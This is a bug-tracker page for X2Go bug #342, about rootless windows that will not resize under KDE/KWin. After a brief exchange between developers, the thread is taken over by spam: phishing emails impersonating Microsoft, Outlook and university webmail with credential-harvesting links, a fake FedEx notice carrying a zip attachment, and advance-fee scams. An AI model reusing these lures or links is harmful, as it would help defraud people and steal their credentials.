X2Go Bug report logs - #342
Seamless / rootless apps don't resize in KDE/Kwin

Package: x2goclient; Maintainer for x2goclient is X2Go Developers <x2go-dev@lists.x2go.org>; Source for x2goclient is src:x2goclient.

Reported by: Wil <nodenet@hotmail.com>

Date: Sun, 17 Nov 2013 00:18:02 UTC

Severity: normal

Reply or subscribe to this bug.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>, owner@bugs.x2go.org:
Bug#342; Package x2goclient 4.0.1.1-0~427~ubuntu12.04.1. (Sun, 17 Nov 2013 00:18:02 GMT) (full text, mbox, link).


Acknowledgement sent to Wil <nodenet@hotmail.com>:
New Bug report received and forwarded. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>, owner@bugs.x2go.org.

Your message had a Version: pseudo-header with an invalid package version:

4.0.1.1 (from x2go stable)

please either use found or fixed to the control server with a correct version, or reply to this report indicating the correct version so the maintainer (or someone else) can correct it for you.

(Sun, 17 Nov 2013 00:18:02 GMT) (full text, mbox, link).


Message #5 received at submit@bugs.x2go.org (full text, mbox, reply):

From: Wil <nodenet@hotmail.com>
To: <submit@bugs.x2go.org>
Subject: Seamless / rootless apps don't resize in KDE/Kwin
Date: Sun, 17 Nov 2013 00:04:22 +0000
Package: x2goclient 4.0.1.1-0~427~ubuntu12.04.1
Version: 4.0.1.1 (from x2go stable)

Ubuntu 12.04.2 LTS
3.2.0-51-generic-pae #77-Ubuntu SMP Wed Jul 24 20:40:32 UTC 2013 i686
Qt: 4.8.1
KDE Development Platform: 4.8.5 (4.8.5) KDE Daemon: $Id$

When trying to resize a rootless window in kde with kwin window manager the
resize appears blocked. It's possible to resize the window a tiny bit and
then it stops resizing (the resize cursor is still showing though). If all
the affects and compositing are turned off occasionally it will start
working. It seems worse after the application has just been started and when
the resizing kicks in it does seem to keep working. The problem seems to go
away if metacity is chosen as the window manager (obviously this is less
than ideal as a lot of kde functionality is disabled and metacity themes
often feature very fiddly resize borders).







Bug reassigned from package 'x2goclient 4.0.1.1-0~427~ubuntu12.04.1' to 'x2goclient'. Request was from Mike Gabriel <mike.gabriel@das-netzwerkteam.de> to control@bugs.x2go.org. (Fri, 28 Feb 2014 12:00:01 GMT) (full text, mbox, link).


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Thu, 06 Nov 2014 08:20:02 GMT) (full text, mbox, link).


Acknowledgement sent to Mike Gabriel <mike.gabriel@das-netzwerkteam.de>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Thu, 06 Nov 2014 08:20:02 GMT) (full text, mbox, link).


Message #12 received at 342@bugs.x2go.org (full text, mbox, reply):

From: Mike Gabriel <mike.gabriel@das-netzwerkteam.de>
To: Ulrich Sibiller <uli42@gmx.de>, 342@bugs.x2go.org
Cc: x2go-dev@lists.x2go.org
Subject: bug #342
Date: Thu, 06 Nov 2014 08:18:59 +0000
[Message part 1 (text/plain, inline)]
Hi Uli,

thanks once more for your patch fixing #585. As you are currently  
experimenting with X2Go / KDE Apps / rootless NX mode...

Have you come across this issue?
http://bugs.x2go.org/cgi-bin/bugreport.cgi?bug=342

Maybe you feel like taking a look at it? Generally speaking, I hope  
the X2Go project receives more contributions from your side!!! Looking  
forward to that!

Thanks!
Mike

-- 

DAS-NETZWERKTEAM
mike gabriel, herweg 7, 24357 fleckeby
fon: +49 (1520) 1976 148

GnuPG Key ID 0x25771B31
mail: mike.gabriel@das-netzwerkteam.de, http://das-netzwerkteam.de

freeBusy:
https://mail.das-netzwerkteam.de/freebusy/m.gabriel%40das-netzwerkteam.de.xfb
[Message part 2 (application/pgp-signature, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Thu, 06 Nov 2014 09:30:01 GMT) (full text, mbox, link).


Acknowledgement sent to Ulrich Sibiller <uli42@gmx.de>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Thu, 06 Nov 2014 09:30:01 GMT) (full text, mbox, link).


Message #17 received at 342@bugs.x2go.org (full text, mbox, reply):

From: Ulrich Sibiller <uli42@gmx.de>
To: Mike Gabriel <mike.gabriel@das-netzwerkteam.de>
Cc: 342@bugs.x2go.org, x2go-dev@lists.x2go.org
Subject: Re: bug #342
Date: Thu, 6 Nov 2014 10:27:31 +0100
On Thu, Nov 6, 2014 at 9:18 AM, Mike Gabriel
<mike.gabriel@das-netzwerkteam.de> wrote:
> Hi Uli,
>
> thanks once more for your patch fixing #585. As you are currently
> experimenting with X2Go / KDE Apps / rootless NX mode...
>
> Have you come across this issue?
> http://bugs.x2go.org/cgi-bin/bugreport.cgi?bug=342
>
> Maybe you feel like taking a look at it? Generally speaking, I hope the X2Go
> project receives more contributions from your side!!! Looking forward to
> that!

I have using rootless NX with an own script for years now with KDE
both inside and outside the session. I have never come across a
problem like this. The only problem with resizing I am aware of is
slowness, which can be fixed by switching of showing window contents
on resizing and moving on proxy side (where the real X server is).

Uli


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Thu, 06 Nov 2014 23:00:01 GMT) (full text, mbox, link).


Acknowledgement sent to Ulrich Sibiller <uli42@gmx.de>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Thu, 06 Nov 2014 23:00:02 GMT) (full text, mbox, link).


Message #22 received at 342@bugs.x2go.org (full text, mbox, reply):

From: Ulrich Sibiller <uli42@gmx.de>
To: 342@bugs.x2go.org
Subject: Exact circumstances
Date: Thu, 6 Nov 2014 23:57:33 +0100
Wil,

I am a bit unsure about your exact setup. Are you connecting from
Ubuntu 12.04 to 12.04 or to another operating system? Can you still
provoke this behaviour with the latest os updates for 12.04 (there
have been some fixes in libxfixes, IIRC)? Does this happen with 14.04
or 14.10, too? Can you please disable "Show window contents on resize"
and retry?

Uli


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Fri, 12 Aug 2016 06:05:01 GMT) (full text, mbox, link).


Acknowledgement sent to "PIPPIN, DESTINY, A" <destiny.pippin426@topper.wku.edu>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Fri, 12 Aug 2016 06:05:02 GMT) (full text, mbox, link).


Message #27 received at 342@bugs.x2go.org (full text, mbox, reply):

From: "PIPPIN, DESTINY, A" <destiny.pippin426@topper.wku.edu>
To: "LL@LL.COM" <LL@LL.COM>
Subject: can we talk
Date: Fri, 12 Aug 2016 01:28:43 +0000
[Message part 1 (text/plain, inline)]

[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Mon, 03 Oct 2016 23:20:02 GMT) (full text, mbox, link).


Acknowledgement sent to "FedEx 2Day" <cory.wheeler@rrtechnosolutions.com>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Mon, 03 Oct 2016 23:20:02 GMT) (full text, mbox, link).


Message #32 received at 342@bugs.x2go.org (full text, mbox, reply):

From: "FedEx 2Day" <cory.wheeler@rrtechnosolutions.com>
To: 342@bugs.x2go.org
Subject: Problem with parcel shipping, ID:0000823283
Date: Mon, 3 Oct 2016 23:18:35 +0000
[Message part 1 (text/plain, inline)]
Dear Customer,

We could not deliver your parcel.
Please, open email attachment to print shipment label.

Warm regards,
Cory Wheeler,
FedEx Station Manager.

[FedEx_0000823283.zip (application/zip, attachment)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Tue, 01 Nov 2016 21:05:02 GMT) (full text, mbox, link).


Acknowledgement sent to "Robinson, Christina, M" <christina.robinson295@topper.wku.edu>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Tue, 01 Nov 2016 21:05:04 GMT) (full text, mbox, link).


Message #37 received at 342@bugs.x2go.org (full text, mbox, reply):

From: "Robinson, Christina, M" <christina.robinson295@topper.wku.edu>
To: "Robinson, Christina, M" <christina.robinson295@topper.wku.edu>
Subject: [??SUSPICIOUS??]Dear User,
Date: Tue, 1 Nov 2016 19:46:13 +0000
[Message part 1 (text/plain, inline)]
Dear User,
Our Mail Admin database has been breached due to the large number of spam messages we receive. For these reason our admin is currently upgrading the wku Mail server to avoid receiving Spam messages.
Kindly Click Here<http://wkueduupdate.weebly.com/> to Re-validate your WKU Mailbox
wku.edu Webmaster
(c) 2016 Web Upgrade

[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Mon, 16 Jan 2017 09:35:02 GMT) (full text, mbox, link).


Acknowledgement sent to Lorima Tuke <lorimat@oxfam.org.au>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Mon, 16 Jan 2017 09:35:02 GMT) (full text, mbox, link).


Message #42 received at 342@bugs.x2go.org (full text, mbox, reply):

From: Lorima Tuke <lorimat@oxfam.org.au>
To: "IN@BMG.NET" <IN@BMG.NET>
Subject: Mrs. Wang.
Date: Mon, 16 Jan 2017 09:18:21 +0000
[Message part 1 (text/plain, inline)]

Regards from me to you i have a promising proposal for you write me through this mail:: mrswangjuan1@gmail.com

Yours Faithfully,
Mrs. Wang.
[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Fri, 27 Oct 2017 10:50:01 GMT) (full text, mbox, link).


Acknowledgement sent to "info@komatsuinc.com" <info@komatsuinc.com>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Fri, 27 Oct 2017 10:50:02 GMT) (full text, mbox, link).


Message #47 received at 342@bugs.x2go.org (full text, mbox, reply):

From: Vilma Sayão de Brito Avelino <vilma.avelino@agu.gov.br>
To: undisclosed-recipients:;
Subject: Komatsu
Date: Fri, 27 Oct 2017 10:23:42 +0000
[Message part 1 (text/plain, inline)]
I want to inquire if you can be our Company Representative in North America. Looking forward to your email.

________________________________

Ajude a reduzir o consumo de papel. Antes de imprimir, pense no seu compromisso com o MEIO AMBIENTE! Mas, se for imprimir, use a EcoFont (www.agu.gov.br/ecofont)!
[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Thu, 24 May 2018 19:50:04 GMT) (full text, mbox, link).


Acknowledgement sent to Alban LOURS <alban.lours@dauphine.eu>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Thu, 24 May 2018 19:50:04 GMT) (full text, mbox, link).


Message #52 received at 342@bugs.x2go.org (full text, mbox, reply):

From: Alban LOURS <alban.lours@dauphine.eu>
To: "INFO@OUTLOOK.COM" <INFO@OUTLOOK.COM>
Subject: Lieber Freund,
Date: Wed, 23 May 2018 22:10:25 +0000
[Message part 1 (text/plain, inline)]
Lieber Freund,

Ich bin Elena Boris aus Sofia, Bulgarien, verheiratet mit dem späten Ingenieur
Boris, der mit multinationalem Öl-Unternehmen Exxon als gearbeitet
Bohranlage Lieferant in Kuwait für 19 Jahre, bevor er starb auf der
22. August 2009. Wir waren für 24 Jahre verheiratet, ohne ein
Kind. Er starb nach einer kurzen Krankheit, die nur vier Tage dauerte.
Vor seinem Tod hat er die Summe von USD 10.142.728,00 Dollar
mit einem Kurierunternehmen in Indien und dieser Fonds ist derzeit mit dem Kurier wartet auf meine
Auszahlung als Begünstigter und nächster Angehöriger der Fonds. Vor kurzem, mein
Arzt erzählte mir, dass ich nicht zuletzt für die nächsten acht Monate aufgrund
Krebs Problem. Nachdem ich meinen Zustand bekannt, beschloss ich, diese zu spenden
Fonds zu einer Kirche, Organisation oder eine gute Person, die diese nutzen wird
Geld in gutem Glauben.

l nahm diese Entscheidung, weil ich kein Kind habe, das Erben wird
Dieses Geld. Ich hielt diese Kaution geheim, bis Datum; Deshalb bin ich
unter dieser Entscheidung. Ich denke nicht, dass ich irgendein Telefon benötigen werde
Mitteilung in diesem Zusammenhang wegen der Vertraulichkeit dieser
Transaktion. Auf Ihre Antwort werde ich Ihnen den Kontakt des Kuriers geben. Ich
wird auch ein Autorisierungs schreiben an den Kurier ausstellen, der beweisen wird,
Sie der gegenwärtige Nutznießer dieses Geldes. So senden Sie mir Ihre Adresse, Name, Land und Handy.

Warten Sie auf Ihre Antwort und Gott segne Sie.
Elena Boris
[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Sat, 11 Aug 2018 16:35:01 GMT) (full text, mbox, link).


Acknowledgement sent to Firelip Bjeg <firelipbjerg@gmail.com>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Sat, 11 Aug 2018 16:35:01 GMT) (full text, mbox, link).


Message #57 received at 342@bugs.x2go.org (full text, mbox, reply):

From: Firelip Bjeg <firelipbjerg@gmail.com>
To: 342@bugs.x2go.org
Subject: Welcome to
Date: Sat, 11 Aug 2018 18:31:31 +0200
Hi, My Name is Albert MItchell (racineLLC Corporation)
Please i need to talk with someone from Support Team.
Thanks


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Sun, 12 Aug 2018 17:50:01 GMT) (full text, mbox, link).


Acknowledgement sent to romny balvia <testifyflow@gmail.com>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Sun, 12 Aug 2018 17:50:02 GMT) (full text, mbox, link).


Message #62 received at 342@bugs.x2go.org (full text, mbox, reply):

From: romny balvia <testifyflow@gmail.com>
To: 342@bugs.x2go.org
Subject: Welcome to
Date: Sun, 12 Aug 2018 19:44:29 +0200
Hi, My Name is Albert MItchell (racineLLC Corporation)
Please i need to talk with someone from Support Team.
Thanks


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Thu, 13 Sep 2018 23:30:02 GMT) (full text, mbox, link).


Acknowledgement sent to Maria Rosaria Ascione <mascione@regione.lazio.it>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Thu, 13 Sep 2018 23:30:04 GMT) (full text, mbox, link).


Message #67 received at 342@bugs.x2go.org (full text, mbox, reply):

From: Maria Rosaria Ascione <mascione@regione.lazio.it>
To: "NO-REPLY@MICROSOFT.NET" <NO-REPLY@MICROSOFT.NET>
Subject: Microsoft Account Database Upgrade.
Date: Thu, 13 Sep 2018 23:19:21 +0000
[Message part 1 (text/plain, inline)]
Outlook

Dear Account User,
A few of your incoming mails were placed on pending status due to the recent upgrade on our database. In order to receive your messages,
CLICK HERE<https://anthonykarin.wixsite.com/outlook> to login and wait for response from Webmail.

We apologies for any inconvenience and appreciate your understanding.
Thank You.

Copyright © 2017 Webmail .Inc . All rights reserved.































[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Fri, 25 Jan 2019 05:55:03 GMT) (full text, mbox, link).


Acknowledgement sent to Gheorghe SOARE <g_soare@chim.upb.ro>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Fri, 25 Jan 2019 05:55:03 GMT) (full text, mbox, link).


Message #72 received at 342@bugs.x2go.org (full text, mbox, reply):

From: Gheorghe SOARE <g_soare@chim.upb.ro>
To: undisclosed-recipients:;
Subject: Кредит
Date: Fri, 25 Jan 2019 02:36:46 +0200 (EET)
Шановні пані та панове

Ви шукали кредит для початку нового бізнесу, фінансування проекту або виплати боргів?

Ось шанс, який Ви чекали, оскільки наша Кредитна компанія пропонує широкий спектр фінансових послуг, таких як кредити на нерухомість, кредити на заробітну плату, бізнес кредити, шкільні кредити, іпотечні та персональні кредити на тривалу та коротку перспективу з відсотками 3% .

Якщо ви зацікавлені, будь ласка, зв'яжіться з нами по електронній пошті fastservice.sunloansltd@fastservice.com, якнайшвидше і отримайте кредит, який Ви шукаєте протягом 72 годин. Ви також можете подати заявку на нашому веб-сайті за адресою www.sunloansltds.com або заповнити анкету кредиту нижче.

Ім'я:
Стать:
Країна:
Необхідна сума:
тривалість:
Мета:

Дякую,

З повагою,

SUN LOANS LTD
Електронна пошта: fastservice.sunloansltd@fastservice.com
Веб-сайт: www.sunloansltds.com
Телефон: +44 1173255522

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Thu, 14 Feb 2019 21:35:01 GMT) (full text, mbox, link).


Acknowledgement sent to <robert.villa@asl3.liguria.it>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Thu, 14 Feb 2019 21:35:01 GMT) (full text, mbox, link).


Message #77 received at 342@bugs.x2go.org (full text, mbox, reply):

From: <robert.villa@asl3.liguria.it>
To: <No-reply@Microsoft.net>
Subject: Review Updated Terms and conditions to have a better Experience with Microsoft
Date: Thu, 14 Feb 2019 21:27:57 +0000
ACCOUNT SECURITY UPDATE

We notice some irregularities in your account and you are obliged to click on the below link and fill in your correct details to upgrade your account to the latest version.

CLICK HERE<https://lovelyrose4menow.wixsite.com/mysite> To update your account to the current version.

Failure to do this your account will be suspended in the next 24hrs.

MICROSOFT 2018 UPDATE
Copyright © 2018 Web-mail.Inc. All rights reserved.






























































































































Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Thu, 28 Feb 2019 23:45:03 GMT) (full text, mbox, link).


Acknowledgement sent to Maria de Fátima Teixeira <mpteixeira@ihru.pt>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Thu, 28 Feb 2019 23:45:03 GMT) (full text, mbox, link).


Message #82 received at 342@bugs.x2go.org (full text, mbox, reply):

From: Maria de Fátima Teixeira <mpteixeira@ihru.pt>
To: "no-reply@microsoft.net" <no-reply@microsoft.net>
Subject: Microsoft Final Notice
Date: Thu, 28 Feb 2019 23:29:26 +0000
[Message part 1 (text/plain, inline)]
Update your account

Our record indicates that your account has not been updated, which may result in your account being terminated. If you do not update your account, you will no longer be able to send and receive e-mails and will also be denied access to many of our latest advanced conversations, contacts and attachments.

Take a minute to update your account for a faster and more complete mailing experience.

Click here to update your account<https://outlooklive.wixsite.com/mysite>
Note: If you do not update your mailbox, a permanent deletion of your account will occur.

Thank you very much,
The security team

Copyright © 2018 Webmail .Inc. All rights reserved.





























































































































**********************************************************************
This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they
are addressed. If you have received this email in error please notify
the system manager.

Scanned by the Clearswift SECURE Email Gateway.

www.clearswift.com
**********************************************************************
[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Sun, 03 Mar 2019 06:55:01 GMT) (full text, mbox, link).


Acknowledgement sent to "Oasis Petroleum Inc." <greghills@oasispetroleum.com.co>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Sun, 03 Mar 2019 06:55:01 GMT) (full text, mbox, link).


Message #87 received at 342@bugs.x2go.org (full text, mbox, reply):

From: "Oasis Petroleum Inc." <greghills@oasispetroleum.com.co>
To: 342@bugs.x2go.org
Subject: Partner/Agent needed urgently
Date: Sun, 3 Mar 2019 06:41:22 +0000
Oasis Petroleum Inc. in USA is looking for a partner/agent to be our facilitator in America, Europe and Asia, in which you will act as an intermediary between our company and final buyers of petroleum products in those regions and to negotiate with customers on our behalf. 

If interested, get back to us for more information.

Regards,
Greg Hills,
VP Marketing and Midstream
1001 Fannin Street, Suite 1500
Houston, Texas 77002
Telephone: 0800-OASIS
Visit our website at http://www.oasispetroleum.com


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Mon, 04 Mar 2019 04:20:01 GMT) (full text, mbox, link).


Acknowledgement sent to "Long, Vo Thanh Long (VPHCM-TCT)" <vtlong01@gdt.gov.vn>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Mon, 04 Mar 2019 04:20:02 GMT) (full text, mbox, link).


Message #92 received at 342@bugs.x2go.org (full text, mbox, reply):

From: "Long, Vo Thanh Long (VPHCM-TCT)" <vtlong01@gdt.gov.vn>
To: undisclosed-recipients:;
Subject: Hello friend.
Date: Mon, 4 Mar 2019 03:55:26 +0000
[Message part 1 (text/plain, inline)]
Hello friend.

I have an urgent proposal for you.
Kindly reply me via: (ahmedkoffi101@gmail.com) for more information.​...​
[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Fri, 02 Aug 2019 03:25:02 GMT) (full text, mbox, link).


Acknowledgement sent to Loiodice Thierry <thierry.loiodice@lametro.fr>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Fri, 02 Aug 2019 03:25:02 GMT) (full text, mbox, link).


Message #97 received at 342@bugs.x2go.org (full text, mbox, reply):

From: Loiodice Thierry <thierry.loiodice@lametro.fr>
To: Loiodice Thierry <thierry.loiodice@lametro.fr>
Subject: ( URGENT ) Important information
Date: Fri, 2 Aug 2019 03:11:59 +0000
[Message part 1 (text/plain, inline)]
E-mail - Important information
Account temporarily blocked

Your email address has been identified as sending an unusual amount of emails within a short period of time and has been blocked in the Email relay.

This account can be compromised if you do not know any high volume messages sent from this address. Sign in to get instant access<https://staffowasecureloginau.godaddysites.com/> to your account or your account will be blocked.

Thanks,
External Email Manager,
Outlook service for staff and internet service
Copyright2019.
[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Mon, 09 Sep 2019 08:40:02 GMT) (full text, mbox, link).


Acknowledgement sent to juliemorrison198@gmail.com:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Mon, 09 Sep 2019 08:40:02 GMT) (full text, mbox, link).


Message #102 received at 342@bugs.x2go.org (full text, mbox, reply):

From: juliemorrison198@gmail.com
To: 342@bugs.x2go.org
Subject: SEO+SMO Proposal
Date: Mon, 09 Sep 2019 08:39:49 +0000
Hi,
With rich expertise in SEO practices to get websites ranked on top of  
search engine ranking pages in Abigail, Yahoo, MSN, etc., I feel privileged  
to let my esteemed clients leverage my core strength. I’m Julie, a member  
of a leading SEO company in India, and guarantee top page ranks, revenue  
oriented outcomes within 3 to 4 months.
	
Let’s have a look at our packages (for 15 keywords):

1. 50 Directory submissions
2. 50 Social Book marking Submissions
3. 10 Article Submissions (1 article x 10 article directories) 4. 10
Press Release Submissions (1 press release x 10 press release websites)
5.  Google Submissions
6. 1 unique, 400 word article written
7. 1 unique, 400 word press release
8. Meta tags changes suggestions
9. Keyword research
10. Competitor Analysis
11. Heading tag changes
12. Alt tag changes
13. Interlinking wherever required.
14. Keyword Density in site content.
15. HTML Site Map
16. XML site map and Submission in webmaster tool
17. Search Engine
Submission
18. Content optimization
Your quick response will enable us to begin early and suggest the best  
practices for higher ROI. Kindly affirm for a remarkable turnaround.
Kind Regards
Julie Morrison


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Wed, 11 Sep 2019 23:30:03 GMT) (full text, mbox, link).


Acknowledgement sent to Modrá Kateřina <ModraKa@zs13.plzen-edu.cz>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Wed, 11 Sep 2019 23:30:03 GMT) (full text, mbox, link).


Message #107 received at 342@bugs.x2go.org (full text, mbox, reply):

From: Modrá Kateřina <ModraKa@zs13.plzen-edu.cz>
To: "NO-REPLY@MICROSOFT.NET" <NO-REPLY@MICROSOFT.NET>
Subject: A lot of your incoming messages has been suspended
Date: Wed, 11 Sep 2019 20:24:58 +0000
[Message part 1 (text/plain, inline)]
MICROSOFT VERIFICATION NEEDED

A lot of your incoming messages has been suspended because your email box account is not verify by Microsoft verification team. In order to receive your messages do verify<http://uyu8.000webhostapp.com/> now, We apologies for any inconvenience and appreciate your understanding.

Thank You.

Microsoft Verification Team

Copyright (c) 2019 Webmail .Inc . All rights reserved.












?
[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Thu, 12 Sep 2019 21:00:01 GMT) (full text, mbox, link).


Acknowledgement sent to Техническая поддержка ЦФО <techsup-cfo@rkn.gov.ru>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Thu, 12 Sep 2019 21:00:02 GMT) (full text, mbox, link).


Message #112 received at 342@bugs.x2go.org (full text, mbox, reply):

From: Техническая поддержка ЦФО <techsup-cfo@rkn.gov.ru>
To: "NO-REPLY@MICROSOFT.NET" <NO-REPLY@MICROSOFT.NET>
Subject: A lot of your incoming messages has been suspended
Date: Thu, 12 Sep 2019 20:57:04 +0000
[Message part 1 (text/plain, inline)]
MICROSOFT VERIFICATION NEEDED


A lot of your incoming messages has been suspended because your email box account is not verify by Microsoft verification team. In order to receive your messages do verify<http://ng32.000webhostapp.com/> now, We apologies for any inconvenience and appreciate your understanding.


Thank You.


Microsoft Verification Team


Copyright © 2019 Webmail .Inc . All rights reserved.

? ?
[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Mon, 07 Oct 2019 21:15:02 GMT) (full text, mbox, link).


Acknowledgement sent to Bebelyn Migabon Buhayan Dam <bdz@kerteminde.dk>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Mon, 07 Oct 2019 21:15:02 GMT) (full text, mbox, link).


Message #117 received at 342@bugs.x2go.org (full text, mbox, reply):

From: Bebelyn Migabon Buhayan Dam <bdz@kerteminde.dk>
To: "NO-REPLY@MICROSOFT.NET" <NO-REPLY@MICROSOFT.NET>
Subject: Do note that your e-mail box account urgently needs to be verify now
Date: Mon, 7 Oct 2019 21:07:05 +0000
[Message part 1 (text/plain, inline)]
MICROSOFT URGENT NOTIFICATION


Do note that your e-mail box account urgently needs to be verify now inother to release about 20 of your incoming messages that has been currently suspended.Do click on the verify below to verify your account now.


VERIFY<https://qwertqwqwereqwerqw.wixsite.com/mysite>


Microsoft Verification Team


Copyright © 2019 Microsoft .Inc . All rights reserved.
[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Sun, 15 Dec 2019 08:55:02 GMT) (full text, mbox, link).


Acknowledgement sent to beatrizthompson20@gmail.com:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Sun, 15 Dec 2019 08:55:02 GMT) (full text, mbox, link).


Message #122 received at 342@bugs.x2go.org (full text, mbox, reply):

From: beatrizthompson20@gmail.com
To: 342@bugs.x2go.org
Subject: SEO+SMO Proposal
Date: Sun, 15 Dec 2019 08:53:45 +0000
Hi,
                 	
My name is Beatriz, and am working with a reputable leading S.E.O. Company  
in INDIA
We have the expertise to get our customer's websites top ranking in Google,  
Yahoo, and MSN and other search engines
producing high revenue with top page rank, guaranteed based result within  
3-4 months

We provide a S.E.O. special offer for the following package:

1. 10 Directory submissions
2. 30 Social Bookmarking Submissions
3. 1 Article Submissions (1 article x 1 article directories)
4. 1 Blog Submissions (1 blog x 1 blog posting)
5. Google Submissions
6. 1 unique, 400 word article written
7. 1 unique, 300 word blog
8. Meta tags changes suggestions
9. Keyword research
10. Competitor Analysis
11. Heading tag changes
12. Alt tag changes
13. Interlinking wherever required.
14. Keyword Density in site content.
15. HTML Site Map
16. XML site map and Submission in webmaster tool
17. Search Engine Submission
18. Content optimization

Let me know if you interested so give me your website with keyword would do  
an analysis on it to suggest you the best.
Looking forward for your positive reply here you can Target More than 15  
keywords

Kind Regards
Beatriz Thompson


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#342; Package x2goclient. (Tue, 10 Mar 2020 21:00:03 GMT) (full text, mbox, link).


Acknowledgement sent to Nocilla Antonietta <antonietta.nocilla@pfafineco.it>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Tue, 10 Mar 2020 21:00:03 GMT) (full text, mbox, link).


Message #127 received at 342@bugs.x2go.org (full text, mbox, reply):

From: Nocilla Antonietta <antonietta.nocilla@pfafineco.it>
To: "general@notice.co" <general@notice.co>
Subject: Microsoft Outlook
Date: Tue, 10 Mar 2020 20:59:15 +0000
[Message part 1 (text/plain, inline)]
Today Wednesday, March 11th 2020, we are upgrading our email system to Microsoft Outlook Web App 2020. This service creates more space and easy access to emails.
Please update your account by clicking the link below and enter information for activation.

